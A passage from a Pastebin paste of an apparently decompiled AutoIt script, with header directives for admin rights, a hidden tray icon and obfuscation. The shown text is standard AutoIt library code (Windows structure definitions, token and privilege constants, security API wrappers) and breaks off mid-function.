Advertisement
Guest User

Untitled

a guest
Aug 13th, 2017
590
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 213.38 KB | None | 0 0
  1. #NoTrayIcon
  2. #RequireAdmin
  3. #Region
  4. #AutoIt3Wrapper_Compression=4
  5. #AutoIt3Wrapper_UseX64=n
  6. #AutoIt3Wrapper_Res_Language=1031
  7. #AutoIt3Wrapper_Run_Tidy=y
  8. #AutoIt3Wrapper_Run_Obfuscator=y
  9. #EndRegion
  10. GLOBAL $_COMMON_KERNEL32DLL=DLLOPEN("kernel32.dll")
  11. GLOBAL $_COMMON_USER32DLL=DLLOPEN("user32.dll")
  12. GLOBAL CONST $ERROR_NO_TOKEN=1008
  13. GLOBAL CONST $SE_ASSIGNPRIMARYTOKEN_NAME="SeAssignPrimaryTokenPrivilege"
  14. GLOBAL CONST $SE_AUDIT_NAME="SeAuditPrivilege"
  15. GLOBAL CONST $SE_BACKUP_NAME="SeBackupPrivilege"
  16. GLOBAL CONST $SE_CHANGE_NOTIFY_NAME="SeChangeNotifyPrivilege"
  17. GLOBAL CONST $SE_CREATE_GLOBAL_NAME="SeCreateGlobalPrivilege"
  18. GLOBAL CONST $SE_CREATE_PAGEFILE_NAME="SeCreatePagefilePrivilege"
  19. GLOBAL CONST $SE_CREATE_PERMANENT_NAME="SeCreatePermanentPrivilege"
  20. GLOBAL CONST $SE_CREATE_TOKEN_NAME="SeCreateTokenPrivilege"
  21. GLOBAL CONST $SE_DEBUG_NAME="SeDebugPrivilege"
  22. GLOBAL CONST $SE_ENABLE_DELEGATION_NAME="SeEnableDelegationPrivilege"
  23. GLOBAL CONST $SE_IMPERSONATE_NAME="SeImpersonatePrivilege"
  24. GLOBAL CONST $SE_INC_BASE_PRIORITY_NAME="SeIncreaseBasePriorityPrivilege"
  25. GLOBAL CONST $SE_INCREASE_QUOTA_NAME="SeIncreaseQuotaPrivilege"
  26. GLOBAL CONST $SE_LOAD_DRIVER_NAME="SeLoadDriverPrivilege"
  27. GLOBAL CONST $SE_LOCK_MEMORY_NAME="SeLockMemoryPrivilege"
  28. GLOBAL CONST $SE_MACHINE_ACCOUNT_NAME="SeMachineAccountPrivilege"
  29. GLOBAL CONST $SE_MANAGE_VOLUME_NAME="SeManageVolumePrivilege"
  30. GLOBAL CONST $SE_PROF_SINGLE_PROCESS_NAME="SeProfileSingleProcessPrivilege"
  31. GLOBAL CONST $SE_REMOTE_SHUTDOWN_NAME="SeRemoteShutdownPrivilege"
  32. GLOBAL CONST $SE_RESTORE_NAME="SeRestorePrivilege"
  33. GLOBAL CONST $SE_SECURITY_NAME="SeSecurityPrivilege"
  34. GLOBAL CONST $SE_SHUTDOWN_NAME="SeShutdownPrivilege"
  35. GLOBAL CONST $SE_SYNC_AGENT_NAME="SeSyncAgentPrivilege"
  36. GLOBAL CONST $SE_SYSTEM_ENVIRONMENT_NAME="SeSystemEnvironmentPrivilege"
  37. GLOBAL CONST $SE_SYSTEM_PROFILE_NAME="SeSystemProfilePrivilege"
  38. GLOBAL CONST $SE_SYSTEMTIME_NAME="SeSystemtimePrivilege"
  39. GLOBAL CONST $SE_TAKE_OWNERSHIP_NAME="SeTakeOwnershipPrivilege"
  40. GLOBAL CONST $SE_TCB_NAME="SeTcbPrivilege"
  41. GLOBAL CONST $SE_UNSOLICITED_INPUT_NAME="SeUnsolicitedInputPrivilege"
  42. GLOBAL CONST $SE_UNDOCK_NAME="SeUndockPrivilege"
  43. GLOBAL CONST $SE_PRIVILEGE_ENABLED_BY_DEFAULT=1
  44. GLOBAL CONST $SE_PRIVILEGE_ENABLED=2
  45. GLOBAL CONST $SE_PRIVILEGE_REMOVED=4
  46. GLOBAL CONST $SE_PRIVILEGE_USED_FOR_ACCESS=-2147483648
  47. GLOBAL CONST $TOKENUSER=1
  48. GLOBAL CONST $TOKENGROUPS=2
  49. GLOBAL CONST $TOKENPRIVILEGES=3
  50. GLOBAL CONST $TOKENOWNER=4
  51. GLOBAL CONST $TOKENPRIMARYGROUP=5
  52. GLOBAL CONST $TOKENDEFAULTDACL=6
  53. GLOBAL CONST $TOKENSOURCE=7
  54. GLOBAL CONST $TOKENTYPE=8
  55. GLOBAL CONST $TOKENIMPERSONATIONLEVEL=9
  56. GLOBAL CONST $TOKENSTATISTICS=10
  57. GLOBAL CONST $TOKENRESTRICTEDSIDS=11
  58. GLOBAL CONST $TOKENSESSIONID=12
  59. GLOBAL CONST $TOKENGROUPSANDPRIVILEGES=13
  60. GLOBAL CONST $TOKENSESSIONREFERENCE=14
  61. GLOBAL CONST $TOKENSANDBOXINERT=15
  62. GLOBAL CONST $TOKENAUDITPOLICY=16
  63. GLOBAL CONST $TOKENORIGIN=17
  64. GLOBAL CONST $TOKENELEVATIONTYPE=18
  65. GLOBAL CONST $TOKENLINKEDTOKEN=19
  66. GLOBAL CONST $TOKENELEVATION=20
  67. GLOBAL CONST $TOKENHASRESTRICTIONS=21
  68. GLOBAL CONST $TOKENACCESSINFORMATION=22
  69. GLOBAL CONST $TOKENVIRTUALIZATIONALLOWED=23
  70. GLOBAL CONST $TOKENVIRTUALIZATIONENABLED=24
  71. GLOBAL CONST $TOKENINTEGRITYLEVEL=25
  72. GLOBAL CONST $TOKENUIACCESS=26
  73. GLOBAL CONST $TOKENMANDATORYPOLICY=27
  74. GLOBAL CONST $TOKENLOGONSID=28
  75. GLOBAL CONST $TOKEN_ASSIGN_PRIMARY=1
  76. GLOBAL CONST $TOKEN_DUPLICATE=2
  77. GLOBAL CONST $TOKEN_IMPERSONATE=4
  78. GLOBAL CONST $TOKEN_QUERY=8
  79. GLOBAL CONST $TOKEN_QUERY_SOURCE=16
  80. GLOBAL CONST $TOKEN_ADJUST_PRIVILEGES=32
  81. GLOBAL CONST $TOKEN_ADJUST_GROUPS=64
  82. GLOBAL CONST $TOKEN_ADJUST_DEFAULT=128
  83. GLOBAL CONST $TOKEN_ADJUST_SESSIONID=256
  84. GLOBAL CONST $TAGPOINT="long X;long Y"
  85. GLOBAL CONST $TAGRECT="long Left;long Top;long Right;long Bottom"
  86. GLOBAL CONST $TAGSIZE="long X;long Y"
  87. GLOBAL CONST $TAGMARGINS="int cxLeftWidth;int cxRightWidth;int cyTopHeight;int cyBottomHeight"
  88. GLOBAL CONST $TAGFILETIME="dword Lo;dword Hi"
  89. GLOBAL CONST $TAGSYSTEMTIME="word Year;word Month;word Dow;word Day;word Hour;word Minute;word Second;word MSeconds"
  90. GLOBAL CONST $TAGTIME_ZONE_INFORMATION="long Bias;wchar StdName[32];word StdDate[8];long StdBias;wchar DayName[32];word DayDate[8];long DayBias"
  91. GLOBAL CONST $TAGNMHDR="hwnd hWndFrom;uint_ptr IDFrom;INT Code"
  92. GLOBAL CONST $TAGCOMBOBOXEXITEM="uint Mask;int_ptr Item;ptr Text;int TextMax;int Image;int SelectedImage;int OverlayImage;"&"int Indent;lparam Param"
  93. GLOBAL CONST $TAGNMCBEDRAGBEGIN=$TAGNMHDR&";int ItemID;ptr szText"
  94. GLOBAL CONST $TAGNMCBEENDEDIT=$TAGNMHDR&";bool fChanged;int NewSelection;ptr szText;int Why"
  95. GLOBAL CONST $TAGNMCOMBOBOXEX=$TAGNMHDR&";uint Mask;int_ptr Item;ptr Text;int TextMax;int Image;"&"int SelectedImage;int OverlayImage;int Indent;lparam Param"
  96. GLOBAL CONST $TAGDTPRANGE="word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;"&"word MinSecond;word MinMSecond;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;"&"word MaxMinute;word MaxSecond;word MaxMSecond;bool MinValid;bool MaxValid"
  97. GLOBAL CONST $TAGNMDATETIMECHANGE=$TAGNMHDR&";dword Flag;"&$TAGSYSTEMTIME
  98. GLOBAL CONST $TAGNMDATETIMEFORMAT=$TAGNMHDR&";ptr Format;"&$TAGSYSTEMTIME&";ptr pDisplay;wchar Display[64]"
  99. GLOBAL CONST $TAGNMDATETIMEFORMATQUERY=$TAGNMHDR&";ptr Format;long SizeX;long SizeY"
  100. GLOBAL CONST $TAGNMDATETIMEKEYDOWN=$TAGNMHDR&";int VirtKey;ptr Format;"&$TAGSYSTEMTIME
  101. GLOBAL CONST $TAGNMDATETIMESTRING=$TAGNMHDR&";ptr UserString;"&$TAGSYSTEMTIME&";dword Flags"
  102. GLOBAL CONST $TAGEVENTLOGRECORD="dword Length;dword Reserved;dword RecordNumber;dword TimeGenerated;dword TimeWritten;dword EventID;"&"word EventType;word NumStrings;word EventCategory;word ReservedFlags;dword ClosingRecordNumber;dword StringOffset;"&"dword UserSidLength;dword UserSidOffset;dword DataLength;dword DataOffset"
  103. GLOBAL CONST $TAGGDIPBITMAPDATA="uint Width;uint Height;int Stride;int Format;ptr Scan0;uint_ptr Reserved"
  104. GLOBAL CONST $TAGGDIPENCODERPARAM="byte GUID[16];dword Count;dword Type;ptr Values"
  105. GLOBAL CONST $TAGGDIPENCODERPARAMS="dword Count;byte Params[0]"
  106. GLOBAL CONST $TAGGDIPRECTF="float X;float Y;float Width;float Height"
  107. GLOBAL CONST $TAGGDIPSTARTUPINPUT="uint Version;ptr Callback;bool NoThread;bool NoCodecs"
  108. GLOBAL CONST $TAGGDIPSTARTUPOUTPUT="ptr HookProc;ptr UnhookProc"
  109. GLOBAL CONST $TAGGDIPIMAGECODECINFO="byte CLSID[16];byte FormatID[16];ptr CodecName;ptr DllName;ptr FormatDesc;ptr FileExt;"&"ptr MimeType;dword Flags;dword Version;dword SigCount;dword SigSize;ptr SigPattern;ptr SigMask"
  110. GLOBAL CONST $TAGGDIPPENCODERPARAMS="dword Count;byte Params[0]"
  111. GLOBAL CONST $TAGHDITEM="uint Mask;int XY;ptr Text;handle hBMP;int TextMax;int Fmt;lparam Param;int Image;int Order;uint Type;ptr pFilter;uint State"
  112. GLOBAL CONST $TAGNMHDDISPINFO=$TAGNMHDR&";int Item;uint Mask;ptr Text;int TextMax;int Image;lparam lParam"
  113. GLOBAL CONST $TAGNMHDFILTERBTNCLICK=$TAGNMHDR&";int Item;"&$TAGRECT
  114. GLOBAL CONST $TAGNMHEADER=$TAGNMHDR&";int Item;int Button;ptr pItem"
  115. GLOBAL CONST $TAGGETIPADDRESS="byte Field4;byte Field3;byte Field2;byte Field1"
  116. GLOBAL CONST $TAGNMIPADDRESS=$TAGNMHDR&";int Field;int Value"
  117. GLOBAL CONST $TAGLVFINDINFO="uint Flags;ptr Text;lparam Param;"&$TAGPOINT&";uint Direction"
  118. GLOBAL CONST $TAGLVHITTESTINFO=$TAGPOINT&";uint Flags;int Item;int SubItem"
  119. GLOBAL CONST $TAGLVITEM="uint Mask;int Item;int SubItem;uint State;uint StateMask;ptr Text;int TextMax;int Image;lparam Param;"&"int Indent;int GroupID;uint Columns;ptr pColumns"
  120. GLOBAL CONST $TAGNMLISTVIEW=$TAGNMHDR&";int Item;int SubItem;uint NewState;uint OldState;uint Changed;"&"long ActionX;long ActionY;lparam Param"
  121. GLOBAL CONST $TAGNMLVCUSTOMDRAW=$TAGNMHDR&";dword dwDrawStage;handle hdc;long Left;long Top;long Right;long Bottom;"&"dword_ptr dwItemSpec;uint uItemState;lparam lItemlParam"&";dword clrText;dword clrTextBk;int iSubItem;dword dwItemType;dword clrFace;int iIconEffect;"&"int iIconPhase;int iPartId;int iStateId;long TextLeft;long TextTop;long TextRight;long TextBottom;uint uAlign"
  122. GLOBAL CONST $TAGNMLVDISPINFO=$TAGNMHDR&";"&$TAGLVITEM
  123. GLOBAL CONST $TAGNMLVFINDITEM=$TAGNMHDR&";"&$TAGLVFINDINFO
  124. GLOBAL CONST $TAGNMLVGETINFOTIP=$TAGNMHDR&";dword Flags;ptr Text;int TextMax;int Item;int SubItem;lparam lParam"
  125. GLOBAL CONST $TAGNMITEMACTIVATE=$TAGNMHDR&";int Index;int SubItem;uint NewState;uint OldState;uint Changed;"&$TAGPOINT&";lparam lParam;uint KeyFlags"
  126. GLOBAL CONST $TAGNMLVKEYDOWN=$TAGNMHDR&";align 1;word VKey;uint Flags"
  127. GLOBAL CONST $TAGNMLVSCROLL=$TAGNMHDR&";int DX;int DY"
  128. GLOBAL CONST $TAGMCHITTESTINFO="uint Size;"&$TAGPOINT&";uint Hit;"&$TAGSYSTEMTIME
  129. GLOBAL CONST $TAGMCMONTHRANGE="word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;"&"word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;"&"word MaxMSeconds;short Span"
  130. GLOBAL CONST $TAGMCRANGE="word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;"&"word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;"&"word MaxMSeconds;short MinSet;short MaxSet"
  131. GLOBAL CONST $TAGMCSELRANGE="word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;"&"word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;"&"word MaxMSeconds"
  132. GLOBAL CONST $TAGNMDAYSTATE=$TAGNMHDR&";"&$TAGSYSTEMTIME&";int DayState;ptr pDayState"
  133. GLOBAL CONST $TAGNMSELCHANGE=$TAGNMHDR&";word BegYear;word BegMonth;word BegDOW;word BegDay;"&"word BegHour;word BegMinute;word BegSecond;word BegMSeconds;word EndYear;word EndMonth;word EndDOW;"&"word EndDay;word EndHour;word EndMinute;word EndSecond;word EndMSeconds"
  134. GLOBAL CONST $TAGNMOBJECTNOTIFY=$TAGNMHDR&";int Item;ptr piid;ptr pObject;long Result"
  135. GLOBAL CONST $TAGNMTCKEYDOWN=$TAGNMHDR&";word VKey;uint Flags"
  136. GLOBAL CONST $TAGTVITEM="uint Mask;handle hItem;uint State;uint StateMask;ptr Text;int TextMax;int Image;int SelectedImage;"&"int Children;lparam Param"
  137. GLOBAL CONST $TAGTVITEMEX=$TAGTVITEM&";int Integral"
  138. GLOBAL CONST $TAGNMTREEVIEW=$TAGNMHDR&";uint Action;uint OldMask;handle OldhItem;uint OldState;uint OldStateMask;"&"ptr OldText;int OldTextMax;int OldImage;int OldSelectedImage;int OldChildren;lparam OldParam;uint NewMask;handle NewhItem;"&"uint NewState;uint NewStateMask;ptr NewText;int NewTextMax;int NewImage;int NewSelectedImage;int NewChildren;"&"lparam NewParam;long PointX;long PointY"
  139. GLOBAL CONST $TAGNMTVCUSTOMDRAW=$TAGNMHDR&";dword DrawStage;handle HDC;long Left;long Top;long Right;long Bottom;"&"dword_ptr ItemSpec;uint ItemState;lparam ItemParam;dword ClrText;dword ClrTextBk;int Level"
  140. GLOBAL CONST $TAGNMTVDISPINFO=$TAGNMHDR&";"&$TAGTVITEM
  141. GLOBAL CONST $TAGNMTVGETINFOTIP=$TAGNMHDR&";ptr Text;int TextMax;handle hItem;lparam lParam"
  142. GLOBAL CONST $TAGTVHITTESTINFO=$TAGPOINT&";uint Flags;handle Item"
  143. GLOBAL CONST $TAGNMTVKEYDOWN=$TAGNMHDR&";word VKey;uint Flags"
  144. GLOBAL CONST $TAGNMMOUSE=$TAGNMHDR&";dword_ptr ItemSpec;dword_ptr ItemData;"&$TAGPOINT&";lparam HitInfo"
  145. GLOBAL CONST $TAGTOKEN_PRIVILEGES="dword Count;int64 LUID;dword Attributes"
  146. GLOBAL CONST $TAGIMAGEINFO="handle hBitmap;handle hMask;int Unused1;int Unused2;"&$TAGRECT
  147. GLOBAL CONST $TAGMENUINFO="dword Size;INT Mask;dword Style;uint YMax;handle hBack;dword ContextHelpID;ulong_ptr MenuData"
  148. GLOBAL CONST $TAGMENUITEMINFO="uint Size;uint Mask;uint Type;uint State;uint ID;handle SubMenu;handle BmpChecked;handle BmpUnchecked;"&"ulong_ptr ItemData;ptr TypeData;uint CCH;handle BmpItem"
  149. GLOBAL CONST $TAGREBARBANDINFO="uint cbSize;uint fMask;uint fStyle;dword clrFore;dword clrBack;ptr lpText;uint cch;"&"int iImage;hwnd hwndChild;uint cxMinChild;uint cyMinChild;uint cx;handle hbmBack;uint wID;uint cyChild;uint cyMaxChild;"&"uint cyIntegral;uint cxIdeal;lparam lParam;uint cxHeader"
  150. GLOBAL CONST $TAGNMREBARAUTOBREAK=$TAGNMHDR&";uint uBand;uint wID;lparam lParam;uint uMsg;uint fStyleCurrent;bool fAutoBreak"
  151. GLOBAL CONST $TAGNMRBAUTOSIZE=$TAGNMHDR&";bool fChanged;long TargetLeft;long TargetTop;long TargetRight;long TargetBottom;"&"long ActualLeft;long ActualTop;long ActualRight;long ActualBottom"
  152. GLOBAL CONST $TAGNMREBAR=$TAGNMHDR&";dword dwMask;uint uBand;uint fStyle;uint wID;laram lParam"
  153. GLOBAL CONST $TAGNMREBARCHEVRON=$TAGNMHDR&";uint uBand;uint wID;lparam lParam;"&$TAGRECT&";lparam lParamNM"
  154. GLOBAL CONST $TAGNMREBARCHILDSIZE=$TAGNMHDR&";uint uBand;uint wID;long CLeft;long CTop;long CRight;long CBottom;"&"long BLeft;long BTop;long BRight;long BBottom"
  155. GLOBAL CONST $TAGCOLORSCHEME="dword Size;dword BtnHighlight;dword BtnShadow"
  156. GLOBAL CONST $TAGNMTOOLBAR=$TAGNMHDR&";int iItem;"&"int iBitmap;int idCommand;byte fsState;byte fsStyle;align;dword_ptr dwData;int_ptr iString"&";int cchText;ptr pszText;"&$TAGRECT
  157. GLOBAL CONST $TAGNMTBHOTITEM=$TAGNMHDR&";int idOld;int idNew;dword dwFlags"
  158. GLOBAL CONST $TAGTBBUTTON="int Bitmap;int Command;byte State;byte Style;align;dword_ptr Param;int_ptr String"
  159. GLOBAL CONST $TAGTBBUTTONINFO="uint Size;dword Mask;int Command;int Image;byte State;byte Style;word CX;dword_ptr Param;ptr Text;int TextMax"
  160. GLOBAL CONST $TAGNETRESOURCE="dword Scope;dword Type;dword DisplayType;dword Usage;ptr LocalName;ptr RemoteName;ptr Comment;ptr Provider"
  161. GLOBAL CONST $TAGOVERLAPPED="ulong_ptr Internal;ulong_ptr InternalHigh;dword Offset;dword OffsetHigh;handle hEvent"
  162. GLOBAL CONST $TAGOPENFILENAME="dword StructSize;hwnd hwndOwner;handle hInstance;ptr lpstrFilter;ptr lpstrCustomFilter;"&"dword nMaxCustFilter;dword nFilterIndex;ptr lpstrFile;dword nMaxFile;ptr lpstrFileTitle;dword nMaxFileTitle;"&"ptr lpstrInitialDir;ptr lpstrTitle;dword Flags;word nFileOffset;word nFileExtension;ptr lpstrDefExt;lparam lCustData;"&"ptr lpfnHook;ptr lpTemplateName;ptr pvReserved;dword dwReserved;dword FlagsEx"
  163. GLOBAL CONST $TAGBITMAPINFO="dword Size;long Width;long Height;word Planes;word BitCount;dword Compression;dword SizeImage;"&"long XPelsPerMeter;long YPelsPerMeter;dword ClrUsed;dword ClrImportant;dword RGBQuad"
  164. GLOBAL CONST $TAGBLENDFUNCTION="byte Op;byte Flags;byte Alpha;byte Format"
  165. GLOBAL CONST $TAGGUID="dword Data1;word Data2;word Data3;byte Data4[8]"
  166. GLOBAL CONST $TAGWINDOWPLACEMENT="uint length; uint flags;uint showCmd;long ptMinPosition[2];long ptMaxPosition[2];long rcNormalPosition[4]"
  167. GLOBAL CONST $TAGWINDOWPOS="hwnd hWnd;hwnd InsertAfter;int X;int Y;int CX;int CY;uint Flags"
  168. GLOBAL CONST $TAGSCROLLINFO="uint cbSize;uint fMask;int nMin;int nMax;uint nPage;int nPos;int nTrackPos"
  169. GLOBAL CONST $TAGSCROLLBARINFO="dword cbSize;"&$TAGRECT&";int dxyLineButton;int xyThumbTop;"&"int xyThumbBottom;int reserved;dword rgstate[6]"
  170. GLOBAL CONST $TAGLOGFONT="long Height;long Width;long Escapement;long Orientation;long Weight;byte Italic;byte Underline;"&"byte Strikeout;byte CharSet;byte OutPrecision;byte ClipPrecision;byte Quality;byte PitchAndFamily;wchar FaceName[32]"
  171. GLOBAL CONST $TAGKBDLLHOOKSTRUCT="dword vkCode;dword scanCode;dword flags;dword time;ulong_ptr dwExtraInfo"
  172. GLOBAL CONST $TAGPROCESS_INFORMATION="handle hProcess;handle hThread;dword ProcessID;dword ThreadID"
  173. GLOBAL CONST $TAGSTARTUPINFO="dword Size;ptr Reserved1;ptr Desktop;ptr Title;dword X;dword Y;dword XSize;dword YSize;dword XCountChars;"&"dword YCountChars;dword FillAttribute;dword Flags;word ShowWindow;word Reserved2;ptr Reserved3;handle StdInput;"&"handle StdOutput;handle StdError"
  174. GLOBAL CONST $TAGSECURITY_ATTRIBUTES="dword Length;ptr Descriptor;bool InheritHandle"
  175. GLOBAL CONST $TAGWIN32_FIND_DATA="dword dwFileAttributes; dword ftCreationTime[2]; dword ftLastAccessTime[2]; dword ftLastWriteTime[2]; dword nFileSizeHigh; dword nFileSizeLow; dword dwReserved0; dword dwReserved1; wchar cFileName[260]; wchar cAlternateFileName[14]"
  176. FUNC _WINAPI_GETLASTERROR($CURERR=@ERROR,$CUREXT=@EXTENDED)
  177. LOCAL $ARESULT=DLLCALL("kernel32.dll","dword","GetLastError")
  178. RETURN SETERROR($CURERR,$CUREXT,$ARESULT[0])
  179. ENDFUNC
  180. FUNC _WINAPI_SETLASTERROR($IERRCODE,$CURERR=@ERROR,$CUREXT=@EXTENDED)
  181. DLLCALL("kernel32.dll","none","SetLastError","dword",$IERRCODE)
  182. RETURN SETERROR($CURERR,$CUREXT)
  183. ENDFUNC
  184. FUNC _SECURITY__ADJUSTTOKENPRIVILEGES($HTOKEN,$FDISABLEALL,$PNEWSTATE,$IBUFFERLEN,$PPREVSTATE=0,$PREQUIRED=0)
  185. LOCAL $ARESULT=DLLCALL("advapi32.dll","bool","AdjustTokenPrivileges","handle",$HTOKEN,"bool",$FDISABLEALL,"ptr",$PNEWSTATE,"dword",$IBUFFERLEN,"ptr",$PPREVSTATE,"ptr",$PREQUIRED)
  186. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  187. RETURN $ARESULT[0]
  188. ENDFUNC
  189. FUNC _SECURITY__GETACCOUNTSID($SACCOUNT,$SSYSTEM="")
  190. LOCAL $AACCT=_SECURITY__LOOKUPACCOUNTNAME($SACCOUNT,$SSYSTEM)
  191. IF @ERROR THEN RETURN SETERROR(@ERROR,0,0)
  192. RETURN _SECURITY__STRINGSIDTOSID($AACCT[0])
  193. ENDFUNC
  194. FUNC _SECURITY__GETLENGTHSID($PSID)
  195. IF NOT _SECURITY__ISVALIDSID($PSID)THEN RETURN SETERROR(-1,0,0)
  196. LOCAL $ARESULT=DLLCALL("advapi32.dll","dword","GetLengthSid","ptr",$PSID)
  197. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  198. RETURN $ARESULT[0]
  199. ENDFUNC
  200. FUNC _SECURITY__GETTOKENINFORMATION($HTOKEN,$ICLASS)
  201. LOCAL $ARESULT=DLLCALL("advapi32.dll","bool","GetTokenInformation","handle",$HTOKEN,"int",$ICLASS,"ptr",0,"dword",0,"dword*",0)
  202. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  203. IF NOT $ARESULT[0]THEN RETURN 0
  204. LOCAL $TBUFFER=DLLSTRUCTCREATE("byte["&$ARESULT[5]&"]")
  205. LOCAL $PBUFFER=DLLSTRUCTGETPTR($TBUFFER)
  206. $ARESULT=DLLCALL("advapi32.dll","bool","GetTokenInformation","handle",$HTOKEN,"int",$ICLASS,"ptr",$PBUFFER,"dword",$ARESULT[5],"dword*",0)
  207. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  208. IF NOT $ARESULT[0]THEN RETURN 0
  209. RETURN $TBUFFER
  210. ENDFUNC
  211. FUNC _SECURITY__IMPERSONATESELF($ILEVEL=2)
  212. LOCAL $ARESULT=DLLCALL("advapi32.dll","bool","ImpersonateSelf","int",$ILEVEL)
  213. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  214. RETURN $ARESULT[0]
  215. ENDFUNC
  216. FUNC _SECURITY__ISVALIDSID($PSID)
  217. LOCAL $ARESULT=DLLCALL("advapi32.dll","bool","IsValidSid","ptr",$PSID)
  218. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  219. RETURN $ARESULT[0]
  220. ENDFUNC
  221. FUNC _SECURITY__LOOKUPACCOUNTNAME($SACCOUNT,$SSYSTEM="")
  222. LOCAL $TDATA=DLLSTRUCTCREATE("byte SID[256]")
  223. LOCAL $PSID=DLLSTRUCTGETPTR($TDATA,"SID")
  224. LOCAL $ARESULT=DLLCALL("advapi32.dll","bool","LookupAccountNameW","wstr",$SSYSTEM,"wstr",$SACCOUNT,"ptr",$PSID,"dword*",256,"wstr","","dword*",256,"int*",0)
  225. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  226. IF NOT $ARESULT[0]THEN RETURN 0
  227. LOCAL $AACCT[3]
  228. $AACCT[0]=_SECURITY__SIDTOSTRINGSID($PSID)
  229. $AACCT[1]=$ARESULT[5]
  230. $AACCT[2]=$ARESULT[7]
  231. RETURN $AACCT
  232. ENDFUNC
  233. FUNC _SECURITY__LOOKUPACCOUNTSID($VSID)
  234. LOCAL $PSID,$AACCT[3]
  235. IF ISSTRING($VSID)THEN
  236. LOCAL $TSID=_SECURITY__STRINGSIDTOSID($VSID)
  237. $PSID=DLLSTRUCTGETPTR($TSID)
  238. ELSE
  239. $PSID=$VSID
  240. ENDIF
  241. IF NOT _SECURITY__ISVALIDSID($PSID)THEN RETURN SETERROR(-1,0,0)
  242. LOCAL $ARESULT=DLLCALL("advapi32.dll","bool","LookupAccountSidW","ptr",0,"ptr",$PSID,"wstr","","dword*",256,"wstr","","dword*",256,"int*",0)
  243. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  244. IF NOT $ARESULT[0]THEN RETURN 0
  245. LOCAL $AACCT[3]
  246. $AACCT[0]=$ARESULT[3]
  247. $AACCT[1]=$ARESULT[5]
  248. $AACCT[2]=$ARESULT[7]
  249. RETURN $AACCT
  250. ENDFUNC
  251. FUNC _SECURITY__LOOKUPPRIVILEGEVALUE($SSYSTEM,$SNAME)
  252. LOCAL $ARESULT=DLLCALL("advapi32.dll","int","LookupPrivilegeValueW","wstr",$SSYSTEM,"wstr",$SNAME,"int64*",0)
  253. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  254. RETURN SETERROR(0,$ARESULT[0],$ARESULT[3])
  255. ENDFUNC
  256. FUNC _SECURITY__OPENPROCESSTOKEN($HPROCESS,$IACCESS)
  257. LOCAL $ARESULT=DLLCALL("advapi32.dll","int","OpenProcessToken","handle",$HPROCESS,"dword",$IACCESS,"ptr",0)
  258. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  259. RETURN SETERROR(0,$ARESULT[0],$ARESULT[3])
  260. ENDFUNC
  261. FUNC _SECURITY__OPENTHREADTOKEN($IACCESS,$HTHREAD=0,$FOPENASSELF=FALSE )
  262. IF $HTHREAD=0 THEN $HTHREAD=DLLCALL("kernel32.dll","handle","GetCurrentThread")
  263. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  264. LOCAL $ARESULT=DLLCALL("advapi32.dll","bool","OpenThreadToken","handle",$HTHREAD[0],"dword",$IACCESS,"int",$FOPENASSELF,"ptr*",0)
  265. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  266. RETURN SETERROR(0,$ARESULT[0],$ARESULT[4])
  267. ENDFUNC
  268. FUNC _SECURITY__OPENTHREADTOKENEX($IACCESS,$HTHREAD=0,$FOPENASSELF=FALSE )
  269. LOCAL $HTOKEN=_SECURITY__OPENTHREADTOKEN($IACCESS,$HTHREAD,$FOPENASSELF)
  270. IF $HTOKEN=0 THEN
  271. IF _WINAPI_GETLASTERROR()<>$ERROR_NO_TOKEN THEN RETURN SETERROR(-3,_WINAPI_GETLASTERROR(),0)
  272. IF NOT _SECURITY__IMPERSONATESELF()THEN RETURN SETERROR(-1,_WINAPI_GETLASTERROR(),0)
  273. $HTOKEN=_SECURITY__OPENTHREADTOKEN($IACCESS,$HTHREAD,$FOPENASSELF)
  274. IF $HTOKEN=0 THEN RETURN SETERROR(-2,_WINAPI_GETLASTERROR(),0)
  275. ENDIF
  276. RETURN $HTOKEN
  277. ENDFUNC
  278. FUNC _SECURITY__SETPRIVILEGE($HTOKEN,$SPRIVILEGE,$FENABLE)
  279. LOCAL $ILUID=_SECURITY__LOOKUPPRIVILEGEVALUE("",$SPRIVILEGE)
  280. IF $ILUID=0 THEN RETURN SETERROR(-1,0,FALSE )
  281. LOCAL $TCURRSTATE=DLLSTRUCTCREATE($TAGTOKEN_PRIVILEGES)
  282. LOCAL $PCURRSTATE=DLLSTRUCTGETPTR($TCURRSTATE)
  283. LOCAL $ICURRSTATE=DLLSTRUCTGETSIZE($TCURRSTATE)
  284. LOCAL $TPREVSTATE=DLLSTRUCTCREATE($TAGTOKEN_PRIVILEGES)
  285. LOCAL $PPREVSTATE=DLLSTRUCTGETPTR($TPREVSTATE)
  286. LOCAL $IPREVSTATE=DLLSTRUCTGETSIZE($TPREVSTATE)
  287. LOCAL $TREQUIRED=DLLSTRUCTCREATE("int Data")
  288. LOCAL $PREQUIRED=DLLSTRUCTGETPTR($TREQUIRED)
  289. DLLSTRUCTSETDATA($TCURRSTATE,"Count",1)
  290. DLLSTRUCTSETDATA($TCURRSTATE,"LUID",$ILUID)
